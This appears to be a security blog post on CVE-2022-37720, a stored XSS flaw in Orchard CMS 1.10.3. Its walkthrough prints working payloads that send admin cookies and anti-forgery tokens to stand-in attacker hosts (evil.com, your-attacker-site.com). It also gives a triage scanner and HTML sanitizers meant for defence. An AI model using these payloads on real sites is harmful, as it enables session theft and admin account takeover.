In September 2022, a security vulnerability was disclosed for Orchard CMS version 1.10.3, known as CVE-2022-37720. This vulnerability allows attackers with low privileges to inject malicious JavaScript into blog posts, potentially leading to full control over the application's admin accounts. In this post, we’ll break down what CVE-2022-37720 is, how it can be exploited (with code snippets), how to fix it, and where to find the canonical sources.

What Is Orchard CMS?

Orchard CMS is a popular open-source content management system built on ASP.NET. It’s used for building websites and blogs and allows different types of users: Authors, Publishers, and Admins, each with varying permission levels.

Vulnerability Summary

- Affected version: Orchard CMS 1.10.3 (and possibly earlier)
- CVE ID: CVE-2022-37720
- Submitted content (such as a blog post body) is not properly sanitized.
- If an attacker enters HTML plus JavaScript in a post, it is stored and ends up running in the browser of anyone who views it, including Admins.
- Impact: an attacker can steal admin cookies, perform actions as the admin, or take over the account.

Step-by-Step Exploit Walkthrough

Let’s get practical: you are a user with Author permissions.

1. Crafting the Payload

Suppose you want to hijack the admin session. You create a new blog post, entering this as the body:

```html
<h1>Read This!</h1>
<script>
    // Simple example: steal admin cookies and send them to the attacker's server
    fetch('https://evil.com/steal?cookie=' + document.cookie);
</script>
```

Or, to show a simple popup:

```html
<script>alert('XSS by Author!');</script>
```

2. Storing and Triggering

- You save/publish the blog post as usual.
- The post is now live (or pending approval, but still visible to a Publisher/Admin).
- When an admin views the post, the malicious code executes in the context of the admin's logged-in session.
- The script can steal authentication cookies, escalate privileges, or change admin settings on behalf of the admin.

Proof of Concept: Full Account Takeover

Suppose you want to escalate your privileges. Here’s a payload that sends the admin’s anti-CSRF token and session cookie to your server:

```html
<script>
// Exfiltrate the session cookie and the ASP.NET anti-forgery token from the admin's page
fetch('https://your-attacker-site.com/stealin?cookie=' + document.cookie +
      '&csrf=' + document.querySelector('input[name="__RequestVerificationToken"]').value);
</script>
```

Once you have this information, you might forge requests as the admin or reuse the session.
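From the defender's side, the payloads above leave recognisable traces in stored post bodies, which is what an incident responder hunts for after a report like this. The following is an added example, not code from the original post or from Orchard CMS: a small Node.js triage script that scans a constructed set of post records (shaped like a minimal export of id, author and body) for script tags, inline event handlers, script-scheme URLs, cookie access, reads of the `__RequestVerificationToken` field and outbound-request APIs, then groups the hits by author. The record shape, indicator names and sample data are all assumptions made for the example.

```javascript
// Added example (not Orchard CMS code): triage stored post bodies for the
// traces a stored-XSS payload leaves behind. Input records are constructed
// here to look like a minimal export of {id, author, body}.

const INDICATORS = [
  { name: 'script-tag',       re: /<\s*script\b/i },
  { name: 'dangerous-tag',    re: /<\s*(iframe|object|embed|svg|math|base|form)\b/i },
  { name: 'event-handler',    re: /\son[a-z]+\s*=/i },                       // onerror=, onload=, ...
  { name: 'script-url',       re: /(href|src|action)\s*=\s*["']?\s*(javascript|data|vbscript):/i },
  { name: 'cookie-access',    re: /document\.cookie/i },
  { name: 'antiforgery-read', re: /__RequestVerificationToken/ },            // the ASP.NET anti-forgery field
  { name: 'outbound-request', re: /\b(fetch|XMLHttpRequest|sendBeacon|new\s+Image)\b/ },
];

// Returns the names of every indicator that matches one post body, in INDICATORS order.
function scanPostBody(body) {
  return INDICATORS.filter(i => i.re.test(body)).map(i => i.name);
}

// Returns one finding per post that matched anything, in input order.
function triagePosts(posts) {
  const findings = [];
  for (const post of posts) {
    const indicators = scanPostBody(post.body);
    if (indicators.length > 0) findings.push({ id: post.id, author: post.author, indicators });
  }
  return findings;
}

// Groups flagged post ids by author: after a report like this the first question is
// which low-privilege account did it and what else that account has posted.
function suspectAuthors(findings) {
  const byAuthor = {};
  for (const f of findings) {
    if (!byAuthor[f.author]) byAuthor[f.author] = [];
    byAuthor[f.author].push(f.id);
  }
  return byAuthor;
}

// Constructed sample records (not real data).
const SAMPLE_POSTS = [
  { id: 101, author: 'alice',   body: '<h1>Welcome</h1><p>Our <b>first</b> post.</p>' },
  { id: 102, author: 'mallory', body: '<h1>Read This!</h1><script>fetch("https://evil.example/steal?cookie=" + document.cookie);</script>' },
  { id: 103, author: 'mallory', body: '<p>Photo:</p><img src="x" onerror="alert(1)">' },
  { id: 104, author: 'bob',     body: '<p>Check <a href="https://example.org/docs">the docs</a>.</p>' },
];

const sampleFindings = triagePosts(SAMPLE_POSTS);
console.log(JSON.stringify(sampleFindings, null, 2));
console.log('suspect authors:', JSON.stringify(suspectAuthors(sampleFindings)));
```

Run it with `node`; it prints the findings for the constructed records (posts 102 and 103, both by `mallory`). The patterns run over raw stored HTML, so entity-encoded or otherwise obfuscated payloads can slip past them; treat a clean scan as a hint rather than proof, and follow up by reviewing everything else the flagged accounts have published.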

Why Is This Possible?

- Orchard CMS 1.10.3 fails to sanitize HTML/JavaScript submitted by trusted-but-not-admin users (such as Authors).
- The CMS renders the raw HTML in posts without escaping or stripping dangerous tags.
- Unlike modern editors, which encode HTML or restrict dangerous elements, 1.10.3 does not do so by default.
- Any Author or Publisher can effectively become an Admin by luring an admin into viewing their post.
- Site-wide compromise is possible if admins reuse passwords elsewhere or if sensitive tokens are leaked.

The Official References

- NVD entry for CVE-2022-37720
- GitHub: Orchard CMS
- Exploit details on Source Incite blog (ZDI-22-116)

How to Fix

To protect Orchard CMS, sanitize all user input, especially HTML content in blog posts.

1. Upgrade Orchard CMS

- The best way is to upgrade to a newer, supported version.
- If you’re stuck on 1.10.3, consider community patches or mitigations.

2. Use a Sanitization Library

Insert a sanitization step before saving blog post content. For example, using HtmlSanitizer:

```csharp
using Ganss.Xss;   // the HtmlSanitizer NuGet package (older releases of it use the Ganss.XSS namespace)

// Allowlist-based sanitizer: strips <script>, event-handler attributes, javascript: URLs and the like
var sanitizer = new HtmlSanitizer();
// request.Body stands for the raw HTML the author submitted
string cleanHtml = sanitizer.Sanitize(request.Body);
// Save cleanHtml instead of the raw HTML
```
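To make the sanitization step concrete without depending on a NuGet package, here is an added example written in JavaScript so it runs stand-alone under Node.js. It is not Orchard's code and not the HtmlSanitizer library, but it applies the same allowlist approach that library does: only listed tags and attributes survive, script-bearing elements lose their content as well as their tags, URL attributes are limited to safe schemes after entity decoding, and stray text is entity-escaped. The tag and attribute allowlists, function names and sample inputs are assumptions chosen for the example; the sample inputs include the payloads from the walkthrough above.

```javascript
// Added example (not Orchard CMS code, not the HtmlSanitizer package): an allowlist
// HTML sanitizer of the kind a CMS should run on post bodies before storing or rendering.
// Anything not explicitly allowed is removed.

const ALLOWED_TAGS = new Set(['h1', 'h2', 'h3', 'p', 'br', 'b', 'i', 'strong', 'em',
  'ul', 'ol', 'li', 'blockquote', 'code', 'pre', 'a', 'img']);
const ALLOWED_ATTRS = { a: ['href', 'title'], img: ['src', 'alt'] }; // on*, style, etc. are never allowed
const URL_ATTRS = new Set(['href', 'src']);
const SAFE_SCHEMES = new Set(['http', 'https', 'mailto']);
// Elements whose inner text must go too, not just the tags.
const DROP_WITH_CONTENT = new Set(['script', 'style', 'iframe', 'object', 'embed', 'svg', 'math', 'noscript']);
const NAMED = { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'", tab: '\t', newline: '\n', colon: ':' };

// Decode entities in attribute values so an encoded "javascript:" cannot slip past the scheme check.
function decodeEntities(s) {
  const cp = n => (n > 0x10ffff ? '\ufffd' : String.fromCodePoint(n));
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => cp(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => cp(parseInt(d, 10)))
    .replace(/&([a-z]+);/gi, (m, n) => NAMED[n.toLowerCase()] ?? m);
}

// Text nodes: keep well-formed entities the author typed, escape bare '&', '<' and '>'.
function escapeText(s) {
  return s.replace(/&(?![a-z]+;|#\d+;|#x[0-9a-f]+;)/gi, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

// Attribute values are re-encoded from their decoded form, so every '&' is escaped.
function escapeAttr(s) {
  return s.replace(/&/g, '&amp;').replace(/"/g, '&quot;').replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

function isSafeUrl(value) {
  // Drop whitespace/control characters that browsers ignore inside a scheme ("java\tscript:").
  const v = value.replace(/[\u0000-\u0020]/g, '').toLowerCase();
  const scheme = v.match(/^([a-z][a-z0-9+.-]*):/);
  return scheme ? SAFE_SCHEMES.has(scheme[1]) : true; // no scheme means a relative URL
}

function sanitizeAttrs(tag, raw) {
  const allowed = ALLOWED_ATTRS[tag] || [];
  const attrRe = /([a-z_:][-a-z0-9_:.]*)\s*(?:=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/gi;
  let out = '';
  for (let m; (m = attrRe.exec(raw)) !== null;) {
    const name = m[1].toLowerCase();
    if (!allowed.includes(name)) continue;                    // drops onerror=, style=, ...
    const value = decodeEntities(m[2] ?? m[3] ?? m[4] ?? '');
    if (URL_ATTRS.has(name) && !isSafeUrl(value)) continue;   // drops javascript:/data: URLs
    out += ` ${name}="${escapeAttr(value)}"`;
  }
  return out;
}

function sanitizeHtml(input) {
  const tagRe = /<\/?([a-z][a-z0-9]*)\b([^>]*)>/gi;
  let out = '';
  let last = 0;
  let skipUntil = null; // set while inside a DROP_WITH_CONTENT element
  for (let m; (m = tagRe.exec(input)) !== null;) {
    if (!skipUntil) out += escapeText(input.slice(last, m.index));
    last = tagRe.lastIndex;
    const closing = m[0][1] === '/';
    const tag = m[1].toLowerCase();
    if (skipUntil) { if (closing && tag === skipUntil) skipUntil = null; continue; }
    if (DROP_WITH_CONTENT.has(tag)) { if (!closing) skipUntil = tag; continue; }
    if (!ALLOWED_TAGS.has(tag)) continue;                     // unknown tag: drop the tag, keep its text
    out += closing ? `</${tag}>` : `<${tag}${sanitizeAttrs(tag, m[2])}>`;
  }
  if (!skipUntil) out += escapeText(input.slice(last));       // an unclosed <script> swallows the rest
  return out;
}

// Constructed inputs, including the payloads from the write-up above.
const SAMPLES = [
  "<h1>Read This!</h1>\n<script>\n    fetch('https://evil.com/steal?cookie=' + document.cookie);\n</script>",
  "<script>alert('XSS by Author!');</script>",
  '<img src="x" onerror="alert(1)">',
  '<a href="&#106;avascript:alert(1)">click</a>',
  '<p>5 &lt; 6 &amp; 7 > 2 <a href="https://example.org/?a=1&b=2" title="Docs">docs</a></p>',
];
for (const s of SAMPLES) console.log(JSON.stringify(s), '=>', JSON.stringify(sanitizeHtml(s)));
```

The first payload collapses to `<h1>Read This!</h1>`, the popup payload to an empty string, and `<img src="x" onerror="alert(1)">` to `<img src="x">`. Two design choices matter more than the lists themselves: attribute values are decoded before the scheme check and re-encoded on output, which is what defeats `&#106;avascript:` and tab-split schemes, and anything the tokenizer cannot parse as a tag is escaped as text rather than passed through, so malformed markup degrades to visible characters instead of executable markup. HTML comments are escaped into visible text for the same reason; if you need richer markup than this allowlist, extend it deliberately rather than relaxing the default-deny rule.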

Final Thoughts

CVE-2022-37720 is a reminder that “trusted” users should never be able to inject raw HTML and JavaScript unless you’re very sure of them. XSS is dangerous, especially on a platform like Orchard CMS where low-privilege users often create a lot of content.

Want to Learn More?

- OWASP XSS Prevention Cheat Sheet
- Orchard CMS Security Guidelines


*Always sanitize user input, and keep your CMS updated!*

Timeline

Published on: 11/25/2022 16:15:00 UTC
Last modified on: 11/29/2022 22:06:00 UTC